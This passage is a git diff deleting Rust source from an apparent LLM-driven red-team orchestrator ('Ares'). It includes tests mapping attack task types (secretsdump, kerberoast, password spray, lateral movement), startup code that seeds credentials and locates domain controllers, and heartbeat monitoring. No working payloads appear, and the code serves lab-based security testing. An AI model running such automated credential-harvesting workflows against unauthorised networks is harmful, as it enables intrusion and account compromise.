-#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_role_for_task_type_recon_variants() { - for tt in &[ - "recon", - "nmap", - "bloodhound", - "delegation_enum", - "certipy_find", - ] { - assert_eq!( - role_for_task_type(tt), - Some(AgentRole::Recon), - "Failed for: {tt}" - ); - } - } - - #[test] - fn test_role_for_task_type_credential_access_variants() { - for tt in &[ - "credential_access", - "secretsdump", - "share_spider", - "kerberoast", - "asrep_roast", - "password_spray", - ] { - assert_eq!( - role_for_task_type(tt), - Some(AgentRole::CredentialAccess), - "Failed for: {tt}" - ); - } - } - - #[test] - fn test_role_for_task_type_other_roles() { - assert_eq!(role_for_task_type("crack"), Some(AgentRole::Cracker)); - assert_eq!(role_for_task_type("lateral"), Some(AgentRole::Lateral)); - assert_eq!( - role_for_task_type("lateral_movement"), - Some(AgentRole::Lateral) - ); - assert_eq!(role_for_task_type("exploit"), Some(AgentRole::Privesc)); - assert_eq!( - role_for_task_type("privesc_enumeration"), - Some(AgentRole::Privesc) - ); - assert_eq!(role_for_task_type("coercion"), Some(AgentRole::Coercion)); - assert_eq!(role_for_task_type("acl_analysis"), Some(AgentRole::Acl)); - } - - #[test] - fn test_role_for_task_type_unmapped() { - assert_eq!(role_for_task_type("command"), None); - assert_eq!(role_for_task_type("unknown"), None); - assert_eq!(role_for_task_type(""), None); - } - - #[test] - fn test_build_system_prompt_all_roles() { - let snapshot = StateSnapshot::default(); - for role in &[ - AgentRole::Recon, - AgentRole::CredentialAccess, - AgentRole::Cracker, - AgentRole::Acl, -
AgentRole::Privesc, - AgentRole::Lateral, - AgentRole::Coercion, - AgentRole::Orchestrator, - ] { - let result = build_system_prompt(*role, &snapshot); - assert!(result.is_ok(), "Failed for role: {:?}", role); - let prompt = result.unwrap(); - assert!(!prompt.is_empty(), "Empty prompt for role: {:?}", role); - } - } - - #[test] - fn test_build_task_prompt_known_types() { - let snapshot = StateSnapshot::default(); - let payload = serde_json::json!({ - "target_ip": "192.168.58.10", - "domain": "contoso.local", - "techniques": ["nmap"] - }); - - let result = build_task_prompt("recon", "t-1", &payload, &snapshot); - assert!(result.is_ok()); - assert!(!result.unwrap().is_empty()); - } - - #[test] - fn test_build_task_prompt_unknown_type_falls_back() { - let snapshot = StateSnapshot::default(); - let payload = serde_json::json!({"foo": "bar"}); - - let result = build_task_prompt("unknown_type", "t-1", &payload, &snapshot); - assert!(result.is_ok()); - let prompt = result.unwrap(); - assert!(prompt.contains("unknown_type")); - assert!(prompt.contains("task_complete")); - } -} diff --git a/ares-orchestrator/src/main.rs b/ares-orchestrator/src/main.rs deleted file mode 100644 index 3ab22d40..00000000 --- a/ares-orchestrator/src/main.rs +++ /dev/null @@ -1,753 +0,0 @@ -//! Ares Orchestrator — Rust-native orchestration loop. -//! -//! Entry point for the `ares-orchestrator` binary. Rust owns the tokio event -//! loop and all Redis IO. When `ARES_LLM_MODEL` is set, tasks are driven by -//! the Rust LLM agent loop; otherwise they are pushed to Redis for workers. -//! -//! Startup sequence: -//! 1. Load config from env vars -//! 2. Connect to Redis -//! 3. Acquire the operation lock -//! 4. Load shared state from Redis -//! 5. Spawn background tasks: heartbeat monitor, result consumer, deferred -//! processor, cost summary, automation tasks, exploitation workflow, -//! discovery poller, state refresh -//! 6. 
Enter the main orchestration loop - -mod automation; -mod automation_spawner; -#[cfg(feature = "blue")] -mod blue; -mod bootstrap; -pub(crate) mod callback_handler; -mod completion; -mod config; -mod cost_summary; -mod deferred; -mod dispatcher; -mod exploitation; -mod llm_runner; -mod monitoring; -mod output_extraction; -mod recovery; -mod result_processing; -mod results; -mod routing; -mod state; -mod task_queue; -mod throttling; -mod tool_dispatcher; - -use std::sync::Arc; - -use anyhow::{Context, Result}; -use tokio::signal; -use tokio::sync::watch; -use tracing::{error, info, warn}; - -use crate::automation_spawner::spawn_automation_tasks; -use crate::bootstrap::{bootstrap_meta, dispatch_initial_recon}; -use crate::config::OrchestratorConfig; -use crate::cost_summary::spawn_cost_summary; -use crate::deferred::DeferredQueue; -use crate::dispatcher::Dispatcher; -use crate::monitoring::{spawn_heartbeat_monitor, spawn_lock_keeper, AgentRegistry}; -use crate::results::spawn_result_consumer; -use crate::routing::ActiveTaskTracker; -use crate::state::SharedState; -use crate::task_queue::TaskQueue; -use crate::throttling::Throttler; - -#[tokio::main] -async fn main() -> Result<()> { - let _telemetry = ares_core::telemetry::init_telemetry( - ares_core::telemetry::TelemetryConfig::new("ares-orchestrator"), - ); - run().await -} - -async fn run() -> Result<()> { - info!( - version = env!("CARGO_PKG_VERSION"), - "ares-orchestrator starting" - ); - - // --- Blue-only mode: skip red orchestrator, just run blue investigation poller --- - #[cfg(feature = "blue")] - if std::env::var("ARES_BLUE_ONLY").as_deref() == Ok("1") { - return run_blue_only().await; - } - - let config = - Arc::new(OrchestratorConfig::from_env().context("Failed to load config from environment")?); - - // Load the YAML config (optional — provides agent definitions, vuln priorities, etc.) 
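- // A load failure here is non-fatal: the orchestrator falls back to
- // env-var-only configuration (see the Err arm below).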
- let ares_config = match ares_core::config::AresConfig::from_env() { - Ok(cfg) => { - info!( - config_name = %cfg.operation.name, - agent_roles = cfg.agents.len(), - "Loaded YAML config" - ); - Some(Arc::new(cfg)) - } - Err(e) => { - info!("No YAML config loaded (using env vars only): {e}"); - None - } - }; - - info!( - operation_id = %config.operation_id, - max_concurrent = config.max_concurrent_tasks, - has_yaml_config = ares_config.is_some(), - "Configuration loaded" - ); - - let queue = TaskQueue::connect(&config.redis_url) - .await - .context("Failed to connect to Redis")?; - - let acquired = queue - .try_acquire_lock(&config.operation_id, config.lock_ttl) - .await?; - if !acquired { - anyhow::bail!( - "Operation {} is locked by another orchestrator", - config.operation_id - ); - } - - let shared_state = SharedState::new(config.operation_id.clone()); - shared_state - .load_from_redis(&queue) - .await - .context("Failed to load state from Redis")?; - - { - let mut state = shared_state.write().await; - if state.target_ips.is_empty() && !config.target_ips.is_empty() { - state.target_ips = config.target_ips.clone(); - info!( - target_domain = %config.target_domain, - target_ips = ?config.target_ips, - "Seeded target info from operation payload" - ); - } - // Seed target domain into state so automation tasks have it - if !config.target_domain.is_empty() { - let domain = config.target_domain.to_lowercase(); - if !state.domains.contains(&domain) { - state.domains.push(domain.clone()); - // Also persist to Redis - let domain_key = format!("ares:op:{}:domains", state.operation_id); - let mut conn = queue.connection(); - let _: Result<(), _> = - redis::AsyncCommands::sadd(&mut conn, &domain_key, &domain).await; - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; - info!(domain = %domain, "Seeded target domain"); - } - - // Seed domain_controllers from target IPs so automation tasks - // (AS-REP roast, Kerberoast, BloodHound, delegation enum) can fire - // immediately without waiting for recon to report back. - // Probe port 88 (Kerberos) to find a real DC, don't blindly use first IP. - if state.domain_controllers.is_empty() { - let dc_ip = bootstrap::probe_dc_port(&config.target_ips).await; - if let Some(ref ip) = dc_ip { - let dc_key = format!( - "{}:{}:{}", - ares_core::state::KEY_PREFIX, - state.operation_id, - ares_core::state::KEY_DC_MAP, - ); - let mut conn = queue.connection(); - let _: Result<(), _> = - redis::AsyncCommands::hset(&mut conn, &dc_key, &domain, ip).await; - state.domain_controllers.insert(domain.clone(), ip.clone()); - info!( - domain = %domain, - dc_ip = %ip, - "Seeded domain controller from target IPs (port 88 probe)" - ); - - // Also register the credential's domain (may differ from target_domain, - // e.g., child.contoso.local vs contoso.local). - // This ensures automation tasks (spray, kerberoast) can find a DC - // for the credential's domain. 
- if let Some(ref cred) = config.initial_credential { - let cred_domain = cred.domain.to_lowercase(); - if cred_domain != domain && !cred_domain.is_empty() { - let _: Result<(), _> = - redis::AsyncCommands::hset(&mut conn, &dc_key, &cred_domain, ip) - .await; - state - .domain_controllers - .insert(cred_domain.clone(), ip.clone()); - // Also add this domain to the domains set - if !state.domains.contains(&cred_domain) { - state.domains.push(cred_domain.clone()); - let domain_key = format!("ares:op:{}:domains", state.operation_id); - let _: Result<(), _> = redis::AsyncCommands::sadd( - &mut conn, - &domain_key, - &cred_domain, - ) - .await; - } - info!( - cred_domain = %cred_domain, - dc_ip = %ip, - "Also registered credential domain in DC map" - ); - } - } - } else { - warn!("No target IP responded on port 88/389 — DC will be discovered by recon"); - } - } - - // Seed placeholder hosts for ALL target IPs (matches Python startup). - // This ensures all IPs appear in the host list even before recon runs, - // and detect_dc() on service results can trigger domain extraction. - { - let host_key = format!( - "{}:{}:{}", - ares_core::state::KEY_PREFIX, - state.operation_id, - ares_core::state::KEY_HOSTS, - ); - let mut conn = queue.connection(); - for ip in &config.target_ips { - if !state.hosts.iter().any(|h| h.ip == *ip) { - let placeholder = ares_core::models::Host { - ip: ip.clone(), - hostname: String::new(), - os: String::new(), - roles: vec![], - services: vec![], - is_dc: false, - owned: false, - }; - let data = serde_json::to_string(&placeholder).unwrap_or_default(); - let _: Result<(), _> = - redis::AsyncCommands::rpush(&mut conn, &host_key, &data).await; - state.hosts.push(placeholder); - } - } - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &host_key, 86400i64).await; - info!( - count = config.target_ips.len(), - "Seeded placeholder hosts for all target IPs" - ); - } - } - } - - if let Some(ref cred) = config.initial_credential { - let credential = ares_core::models::Credential { - id: uuid::Uuid::new_v4().to_string(), - username: cred.username.clone(), - password: cred.password.clone(), - domain: cred.domain.clone(), - source: "initial".to_string(), - discovered_at: Some(chrono::Utc::now()), - is_admin: false, - parent_id: None, - attack_step: 0, - }; - match shared_state.publish_credential(&queue, credential).await { - Ok(true) => info!( - username = %cred.username, - domain = %cred.domain, - "Seeded initial credential" - ), - Ok(false) => info!("Initial credential already exists (dedup)"), - Err(e) => warn!("Failed to seed initial credential: {e}"), - } - } - - // Write operation metadata to Redis so workers can discover us - bootstrap_meta(&queue, &config).await?; - - let tracker = ActiveTaskTracker::new(); - let registry = AgentRegistry::new(); - let throttler = Arc::new(Throttler::new(config.clone(), tracker.clone())); - let deferred = Arc::new(DeferredQueue::new(queue.clone(), config.clone())); - - // Priority: ARES_LLM_MODEL env var > config YAML agents.orchestrator.model - let model_spec = std::env::var("ARES_LLM_MODEL").ok().or_else(|| { - let config_path = std::env::var("ARES_CONFIG") - .unwrap_or_else(|_| "/ares/config/ares.yaml".to_string()); - std::fs::read_to_string(&config_path) - .ok() - .and_then(|content| { - let yaml: serde_yaml::Value = serde_yaml::from_str(&content).ok()?; - let model = yaml["agents"]["orchestrator"]["model"].as_str()?; - // Prefix with "openai/" if no provider prefix present - let spec = if model.contains('/') { - 
model.to_string() - } else { - format!("openai/{model}") - }; - info!(config = %config_path, model = %spec, "Model loaded from config YAML"); - Some(spec) - }) - }).context("No LLM model configured — set ARES_LLM_MODEL or agents.orchestrator.model in config YAML")?; - let (provider, model_name) = - ares_llm::create_provider(&model_spec).context("Failed to create LLM provider")?; - - // Credential auth throttle — prevents AD account lockout by rate-limiting - // auth-bearing tool calls per credential. Max 3 attempts per 30s window. - // GOAD lockout: 3 bad attempts / 30 min. With multiple concurrent agents, - // even correct passwords can fail if the account is already locked. - let auth_throttle = tool_dispatcher::AuthThrottle::new(3, std::time::Duration::from_secs(30)); - - // Choose tool dispatch strategy: - // ARES_TOOL_DISPATCH=local → in-process via ares_tools::dispatch() - // default → Redis queue for worker consumption (ares:tool_exec:{role}) - let tool_disp: Arc<dyn ares_llm::ToolDispatcher> = - if std::env::var("ARES_TOOL_DISPATCH").as_deref() == Ok("local") { - info!("Tool dispatch: local (in-process via ares-tools)"); - Arc::new(tool_dispatcher::LocalToolDispatcher::new( - queue.clone(), - config.operation_id.clone(), - auth_throttle.clone(), - )) - } else { - info!("Tool dispatch: Redis queue (ares:tool_exec:{{role}})"); - Arc::new(tool_dispatcher::RedisToolDispatcher::new( - queue.clone(), - config.operation_id.clone(), - auth_throttle.clone(), - )) - }; - - let llm_runner = Arc::new(llm_runner::LlmTaskRunner::new( - provider, - model_name.clone(), - tool_disp, - shared_state.clone(), - )); - info!( - model = %model_name, - "LLM runner initialized — Rust drives all agent loops" - ); - - // --- Central dispatcher --- - let dispatcher = Arc::new(Dispatcher::new( - queue.clone(), - tracker.clone(), - throttler.clone(), - deferred.clone(), - shared_state.clone(), - config.clone(), - ares_config.clone(), - llm_runner.clone(), - )); - - // --- Wire orchestrator callback handler --- - // Deferred initialization: the handler needs the dispatcher, which contains - // the llm_runner, creating a circular dependency. OnceLock breaks the cycle. - let callback_handler = Arc::new( - callback_handler::OrchestratorCallbackHandler::new(shared_state.clone(), queue.clone()) - .with_dispatcher(dispatcher.clone()), - ); - llm_runner.set_callback_handler(callback_handler); - info!("Orchestrator callback handler wired (query + dispatch tools)"); - - // --- Shutdown signal --- - let (shutdown_tx, shutdown_rx) = watch::channel(false); - - // --- Spawn background tasks --- - - // Core infrastructure — lock keeper runs independently to prevent - // lock expiry even if heartbeat sweeps or Redis calls hang.
- let lock_handle = spawn_lock_keeper(queue.clone(), config.clone(), shutdown_rx.clone()); - - let hb_handle = spawn_heartbeat_monitor( - queue.clone(), - registry.clone(), - tracker.clone(), - config.clone(), - shutdown_rx.clone(), - ); - - let (_result_handle, mut result_rx) = spawn_result_consumer( - queue.clone(), - tracker.clone(), - config.clone(), - shutdown_rx.clone(), - ); - - let deferred_handle = deferred::spawn_deferred_processor( - deferred.clone(), - dispatcher.clone(), - throttler.clone(), - config.clone(), - shutdown_rx.clone(), - ); - - let cost_handle = spawn_cost_summary(queue.clone(), config.clone(), shutdown_rx.clone()); - - // Exploitation workflow - let exploit_disp = dispatcher.clone(); - let exploit_shutdown = shutdown_rx.clone(); - let exploit_handle = tokio::spawn(async move { - exploitation::exploitation_workflow(exploit_disp, exploit_shutdown).await - }); - - // Discovery poller - let disc_disp = dispatcher.clone(); - let disc_shutdown = shutdown_rx.clone(); - let disc_handle = - tokio::spawn( - async move { result_processing::discovery_poller(disc_disp, disc_shutdown).await }, - ); - - // State refresh - let refresh_disp = dispatcher.clone(); - let refresh_shutdown = shutdown_rx.clone(); - let refresh_handle = - tokio::spawn( - async move { automation::state_refresh(refresh_disp, refresh_shutdown).await }, - ); - - // --- Automation tasks --- - let auto_handles = spawn_automation_tasks(dispatcher.clone(), shutdown_rx.clone()); - - // --- Blue team orchestrator (optional — enabled when ARES_BLUE_ENABLED=1) --- - // Inject observability URLs from YAML config into env vars (blue tools read env vars). - #[cfg(feature = "blue")] - if let Some(ref cfg) = ares_config { - if let Some(ref obs) = cfg.observability { - if !obs.loki_url.is_empty() && std::env::var("LOKI_URL").is_err() { - std::env::set_var("LOKI_URL", &obs.loki_url); - } - if !obs.loki_auth_token.is_empty() && std::env::var("LOKI_AUTH_TOKEN").is_err() { - std::env::set_var("LOKI_AUTH_TOKEN", &obs.loki_auth_token); - } - if !obs.prometheus_url.is_empty() && std::env::var("PROMETHEUS_URL").is_err() { - std::env::set_var("PROMETHEUS_URL", &obs.prometheus_url); - } - } - } - #[cfg(feature = "blue")] - let blue_handle = if std::env::var("ARES_BLUE_ENABLED").as_deref() == Ok("1") { - // Create a separate LLM provider for the blue team - let blue_model_spec = std::env::var("ARES_BLUE_LLM_MODEL") - .ok() - .filter(|s| !s.is_empty()) - .unwrap_or_else(|| model_spec.clone()); - let (blue_provider, blue_model) = ares_llm::create_provider(&blue_model_spec) - .context("Failed to create blue team LLM provider")?; - - let blue_disp: Arc<dyn ares_llm::ToolDispatcher> = - if std::env::var("ARES_TOOL_DISPATCH").as_deref() == Ok("local") { - Arc::new(tool_dispatcher::LocalToolDispatcher::new( - queue.clone(), - config.operation_id.clone(), - auth_throttle.clone(), - )) - } else { - Arc::new(tool_dispatcher::RedisToolDispatcher::new( - queue.clone(), - config.operation_id.clone(), - auth_throttle.clone(), - )) - }; - - info!(model = %blue_model, "Starting blue team orchestrator"); - Some(( - blue::spawn_blue_orchestrator( - blue_provider, - blue_model, - blue_disp, - config.redis_url.clone(), - shutdown_rx.clone(), - ), - blue::spawn_blue_auto_submit( - queue.clone(), - shared_state.clone(), - config.clone(), - blue_model_spec, - shutdown_rx.clone(), - ), - )) - } else { - None - }; - #[cfg(not(feature = "blue"))] - let blue_handle: Option<(tokio::task::JoinHandle<()>, tokio::task::JoinHandle<()>)> = None; - - // --- Recovery check --- - { - let
recovery_mgr = recovery::OperationRecoveryManager::new(config.redis_url.clone()); - match recovery_mgr.recover(&config.operation_id).await { - Ok(recovered) => { - if !recovered.requeued_task_ids.is_empty() || !recovered.failed_task_ids.is_empty() - { - info!( - requeued = recovered.requeued_task_ids.len(), - failed = recovered.failed_task_ids.len(), - "Recovery: re-enqueued interrupted tasks" - ); - } - } - Err(e) => { - // Recovery failure is non-fatal — we already loaded state above - warn!(err = %e, "Recovery check failed (non-fatal, continuing)"); - } - } - } - - // --- Clear stale stop signal --- - // On restart (e.g. re-running with BLUE_ENABLED after a completed op), - // the previous run's stop signal may still be in Redis. Clear it so the - // main loop doesn't exit immediately. - { - let mut conn = queue.connection(); - let stop_key = ares_core::state::build_key(&config.operation_id, "stop_requested"); - let _: Result<(), _> = redis::AsyncCommands::del(&mut conn, &stop_key).await; - } - - // --- Completion monitor --- - let completion_disp = dispatcher.clone(); - let completion_state = shared_state.clone(); - let completion_shutdown = shutdown_rx.clone(); - let completion_handle = tokio::spawn(async move { - completion::wait_for_completion( - &completion_state, - &completion_disp, - completion_shutdown, - std::time::Duration::from_secs( - ares_config - .as_ref() - .map(|c| c.timeouts.operation_timeout) - .filter(|&t| t > 0) - .unwrap_or(7200), - ), - std::time::Duration::from_secs(10), - ) - .await; - info!("Completion monitor finished — operation complete"); - }); - - info!( - operation_id = %config.operation_id, - automation_tasks = auto_handles.len(), - "Orchestration loop started — all background tasks running" - ); - - // --- Pre-flight tool availability check --- - // Wait briefly for workers to start and publish their tool inventories, - // then warn loudly about any critical missing tools. - { - tokio::time::sleep(std::time::Duration::from_secs(5)).await; - let missing = monitoring::preflight_tool_check(&mut queue.connection()).await; - if !missing.is_empty() { - for (role, tools) in &missing { - warn!( - role = %role, - missing = ?tools, - "PREFLIGHT: worker is missing critical tools — operations will be degraded" - ); - } - } else { - info!("Preflight tool check passed — all critical tools available"); - } - } - - // --- Dispatch initial reconnaissance (seeds the reactive automation pipeline) --- - if !config.target_ips.is_empty() { - let recon_count = dispatch_initial_recon(&dispatcher, &config).await; - info!(tasks = recon_count, "Initial recon dispatched"); - } else { - warn!("No target IPs configured — skipping initial recon dispatch"); - } - - // --- Main loop --- - let mut stop_check = tokio::time::interval(std::time::Duration::from_secs(5)); - stop_check.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Skip); - - loop { - tokio::select! { - // Process completed task results - result = result_rx.recv() => { - match result { - Some(completed) => { - result_processing::process_completed_task( - &completed, - &dispatcher, - &throttler, - ).await; - } - None => { - // Result consumer died — channel closed. - // Respawn it after a brief delay. 
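- // The short sleep below keeps a persistent Redis outage from
- // turning this into a hot respawn loop.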
- error!("Result consumer channel closed unexpectedly — restarting consumer"); - tokio::time::sleep(std::time::Duration::from_secs(2)).await; - let (_new_handle, new_rx) = spawn_result_consumer( - queue.clone(), - tracker.clone(), - config.clone(), - shutdown_rx.clone(), - ); - result_rx = new_rx; - } - } - } - - // Poll for remote stop signal from `ares-cli ops stop` - _ = stop_check.tick() => { - let mut conn = queue.connection(); - match ares_core::state::is_stop_requested(&mut conn, &config.operation_id).await { - Ok(true) => { - info!("Remote stop requested via Redis — shutting down"); - break; - } - Ok(false) => {} - Err(e) => { - warn!(err = %e, "Failed to check stop signal"); - } - } - } - - // Graceful shutdown on SIGTERM / SIGINT - _ = signal::ctrl_c() => { - info!("Shutdown signal received"); - break; - } - } - } - - // --- Graceful shutdown --- - info!("Shutting down background tasks..."); - let _ = shutdown_tx.send(true); - - // Blue investigations need time to finalize: score_against_ground_truth, - // set_status("completed"), release_lock, generate_report. 10s was too short. - let shutdown_timeout = std::time::Duration::from_secs(120); - tokio::select! { - _ = async { - let _ = tokio::join!( - lock_handle, - hb_handle, - deferred_handle, - cost_handle, - exploit_handle, - disc_handle, - refresh_handle, - completion_handle, - ); - for h in auto_handles { - let _ = h.await; - } - if let Some((h, auto)) = blue_handle { - let _ = h.await; - let _ = auto.await; - } - } => { - info!("All background tasks stopped"); - } - _ = tokio::time::sleep(shutdown_timeout) => { - warn!("Background task shutdown timed out"); - } - } - - // --- Finalize operation in Redis --- - // Write completion metadata, status key, clear lock and active pointer. - // Matches Python's operation completion sequence. - { - let mut conn = queue.connection(); - let has_da = shared_state.read().await.has_domain_admin; - let status = if has_da { "completed" } else { "stopped" }; - match ares_core::state::finalize_operation(&mut conn, &config.operation_id, status).await { - Ok(()) => info!( - operation_id = %config.operation_id, - status = status, - "Operation finalized in Redis" - ), - Err(e) => warn!( - operation_id = %config.operation_id, - err = %e, - "Failed to finalize operation in Redis" - ), - } - } - - info!("ares-orchestrator stopped"); - Ok(()) -} - -/// Run in blue-only mode: just the investigation poller, no red team. -/// -/// Requires only `ARES_REDIS_URL` and an LLM model. No operation ID needed. 
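-///
-/// Illustrative invocation (model name is a placeholder):
-/// `ARES_BLUE_ONLY=1 ARES_LLM_MODEL=openai/gpt-4o ares-orchestrator`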
-#[cfg(feature = "blue")] -async fn run_blue_only() -> Result<()> { - info!("Running in BLUE-ONLY mode (no red team orchestrator)"); - - let redis_url = - std::env::var("ARES_REDIS_URL").unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string()); - - // Load YAML config for observability URLs - if let Ok(cfg) = ares_core::config::AresConfig::from_env() { - if let Some(ref obs) = cfg.observability { - if !obs.loki_url.is_empty() && std::env::var("LOKI_URL").is_err() { - std::env::set_var("LOKI_URL", &obs.loki_url); - } - if !obs.loki_auth_token.is_empty() && std::env::var("LOKI_AUTH_TOKEN").is_err() { - std::env::set_var("LOKI_AUTH_TOKEN", &obs.loki_auth_token); - } - if !obs.prometheus_url.is_empty() && std::env::var("PROMETHEUS_URL").is_err() { - std::env::set_var("PROMETHEUS_URL", &obs.prometheus_url); - } - } - } - - let model_spec = std::env::var("ARES_LLM_MODEL") - .or_else(|_| std::env::var("ARES_BLUE_LLM_MODEL")) - .context("Set ARES_LLM_MODEL or ARES_BLUE_LLM_MODEL for blue-only mode")?; - - let (provider, model_name) = - ares_llm::create_provider(&model_spec).context("Failed to create LLM provider")?; - - // Blue uses a simple Redis-based tool dispatcher (no operation-scoped auth throttle) - let queue = crate::task_queue::TaskQueue::connect(&redis_url) - .await - .context("Failed to connect to Redis")?; - let auth_throttle = tool_dispatcher::AuthThrottle::new(3, std::time::Duration::from_secs(30)); - let blue_disp: Arc<dyn ares_llm::ToolDispatcher> = - Arc::new(tool_dispatcher::RedisToolDispatcher::new( - queue, - "blue-orchestrator".to_string(), - auth_throttle, - )); - - info!(model = %model_name, redis = %redis_url, "Blue-only orchestrator ready"); - - let (shutdown_tx, shutdown_rx) = watch::channel(false); - - let blue_handle = - blue::spawn_blue_orchestrator(provider, model_name, blue_disp, redis_url, shutdown_rx); - - // Wait for shutdown signal - signal::ctrl_c().await?; - info!("Shutdown signal received"); - let _ = shutdown_tx.send(true); - - let shutdown_timeout = std::time::Duration::from_secs(120); - tokio::select! { - _ = blue_handle => { - info!("Blue orchestrator stopped"); - } - _ = tokio::time::sleep(shutdown_timeout) => { - warn!("Blue orchestrator shutdown timed out"); - } - } - - info!("ares-orchestrator (blue-only) stopped"); - Ok(()) -} diff --git a/ares-orchestrator/src/monitoring.rs b/ares-orchestrator/src/monitoring.rs deleted file mode 100644 index aac7fd8a..00000000 --- a/ares-orchestrator/src/monitoring.rs +++ /dev/null @@ -1,471 +0,0 @@ -//! Heartbeat monitoring and stale-task cleanup. -//! -//! Mirrors the Python `ares.core.dispatcher.monitoring.MonitoringMixin`: -//! - Periodic heartbeat sweep to detect dead agents -//! - Stale task cleanup to prevent throttle deadlock -//! - Operation lock TTL refresh - -use anyhow::Result; -use chrono::{DateTime, Utc}; -use std::collections::HashMap; -use std::sync::Arc; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use crate::config::OrchestratorConfig; -use crate::routing::ActiveTaskTracker; -use crate::task_queue::TaskQueue; - -// --------------------------------------------------------------------------- -// Agent registry -// --------------------------------------------------------------------------- - -/// Live state for a registered agent. -#[derive(Debug, Clone)] -#[allow(dead_code)] -pub struct AgentState { - pub name: String, - pub role: String, - pub status: String, - pub last_heartbeat: DateTime<Utc>, - pub current_task: Option<String>, -} - -/// Registry of known agents with their health state.
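-/// Clones share one underlying map behind an `Arc<Mutex<..>>`, so the
-/// heartbeat monitor and any other holder observe the same registry.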
-#[derive(Debug, Clone)] -pub struct AgentRegistry { - agents: Arc<tokio::sync::Mutex<HashMap<String, AgentState>>>, -} - -impl AgentRegistry { - pub fn new() -> Self { - Self { - agents: Arc::new(tokio::sync::Mutex::new(HashMap::new())), - } - } - - /// Register an agent (or update it if already known). - #[allow(dead_code)] - pub async fn register(&self, name: &str, role: &str) { - let mut agents = self.agents.lock().await; - agents - .entry(name.to_string()) - .and_modify(|a| { - a.role = role.to_string(); - }) - .or_insert_with(|| AgentState { - name: name.to_string(), - role: role.to_string(), - status: "idle".to_string(), - last_heartbeat: Utc::now(), - current_task: None, - }); - } - - /// Update heartbeat data from Redis. - pub async fn update_heartbeat( - &self, - name: &str, - status: &str, - current_task: Option<&str>, - timestamp: DateTime<Utc>, - ) { - let mut agents = self.agents.lock().await; - if let Some(agent) = agents.get_mut(name) { - agent.status = status.to_string(); - agent.current_task = current_task.map(|s| s.to_string()); - agent.last_heartbeat = timestamp; - } - } - - /// Return agents whose heartbeat is older than `timeout`. - pub async fn stale_agents(&self, timeout: std::time::Duration) -> Vec<AgentState> { - let agents = self.agents.lock().await; - let cutoff = Utc::now() - chrono::Duration::from_std(timeout).unwrap_or_default(); - agents - .values() - .filter(|a| a.last_heartbeat < cutoff && a.status != "offline") - .cloned() - .collect() - } - - /// Mark an agent offline. - pub async fn mark_offline(&self, name: &str) { - let mut agents = self.agents.lock().await; - if let Some(agent) = agents.get_mut(name) { - agent.status = "offline".to_string(); - } - } - - /// List all registered agent names (for heartbeat sweep). - pub async fn agent_names(&self) -> Vec<String> { - let agents = self.agents.lock().await; - agents.keys().cloned().collect() - } -} - -// --------------------------------------------------------------------------- -// Lock keeper — independent task that only refreshes the operation lock -// --------------------------------------------------------------------------- - -/// Spawn a dedicated task that extends the operation lock TTL every -/// `heartbeat_interval`. This is intentionally decoupled from the heartbeat -/// sweep so that a slow/hanging Redis call in the sweep cannot block lock -/// refresh and cause the lock to expire. -/// -/// Creates its own Redis connection to avoid contention with the main -/// connection pool used for tool dispatch and result polling. -pub fn spawn_lock_keeper( - queue: TaskQueue, - config: Arc<OrchestratorConfig>, - mut shutdown: watch::Receiver<bool>, -) -> tokio::task::JoinHandle<()> { - tokio::spawn(async move { - // Create a dedicated Redis connection for the lock keeper so that - // EXPIRE commands are not queued behind heavy BRPOP/LPUSH traffic - // on the shared connection manager. - let dedicated_queue = match TaskQueue::connect(&config.redis_url).await { - Ok(q) => { - info!("Lock keeper using dedicated Redis connection"); - q - } - Err(e) => { - warn!(err = %e, "Lock keeper failed to create dedicated connection, falling back to shared"); - queue.clone() - } - }; - - let mut interval = tokio::time::interval(config.heartbeat_interval); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => { - debug!("Lock keeper shutting down"); - break; - } - } - - // Wrap in a timeout so a hung Redis connection can't block us - // for longer than the lock TTL.
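- // (`tokio::time::timeout` wraps the inner `Result` in another
- // `Result`, hence the nested `Ok(Ok(..))` matches below.)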
- let extend_timeout = std::time::Duration::from_secs(10); - let result = tokio::time::timeout( - extend_timeout, - dedicated_queue.extend_lock(&config.operation_id, config.lock_ttl), - ) - .await; - - match result { - Ok(Ok(true)) => {} // Lock TTL refreshed - Ok(Ok(false)) => { - // Lock key disappeared — re-acquire it - warn!( - operation_id = %config.operation_id, - "Lock key missing, attempting re-acquisition" - ); - match dedicated_queue - .try_acquire_lock(&config.operation_id, config.lock_ttl) - .await - { - Ok(true) => info!( - operation_id = %config.operation_id, - "Operation lock re-acquired" - ), - Ok(false) => warn!( - operation_id = %config.operation_id, - "Lock re-acquisition failed — another holder exists" - ), - Err(e) => warn!(err = %e, "Lock re-acquisition error"), - } - } - Ok(Err(e)) => { - warn!(err = %e, "Failed to extend operation lock"); - } - Err(_) => { - warn!("Lock extend timed out (Redis unresponsive?)"); - } - } - } - }) -} - -// --------------------------------------------------------------------------- -// Heartbeat monitor task -// --------------------------------------------------------------------------- - -/// Spawn a background task that periodically: -/// 1. Reads heartbeat keys from Redis for all known agents -/// 2. Marks stale agents as offline -/// 3. Cleans up stale tasks -/// -/// Lock refresh is handled by the separate `spawn_lock_keeper` task. -/// -/// Runs until `shutdown` is signalled. -pub fn spawn_heartbeat_monitor( - queue: TaskQueue, - registry: AgentRegistry, - tracker: ActiveTaskTracker, - config: Arc<OrchestratorConfig>, - mut shutdown: watch::Receiver<bool>, -) -> tokio::task::JoinHandle<()> { - tokio::spawn(async move { - let mut interval = tokio::time::interval(config.heartbeat_interval); - let mut consecutive_failures: u32 = 0; - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => { - info!("Heartbeat monitor shutting down"); - break; - } - } - - if let Err(e) = run_heartbeat_sweep(&queue, &registry, &config).await { - consecutive_failures += 1; - warn!( - attempt = consecutive_failures, - err = %e, - "Heartbeat sweep failed" - ); - // Exponential backoff on repeated failures - let delay = std::time::Duration::from_secs(std::cmp::min( - 15, - (consecutive_failures as u64) * 5, - )); - tokio::time::sleep(delay).await; - continue; - } - consecutive_failures = 0; - - // Clean up stale tasks (salvage any pending results first) - if let Err(e) = cleanup_stale_tasks(&tracker, &queue, &config).await { - warn!(err = %e, "Stale task cleanup failed"); - } - } - }) -} - -/// Read heartbeats from 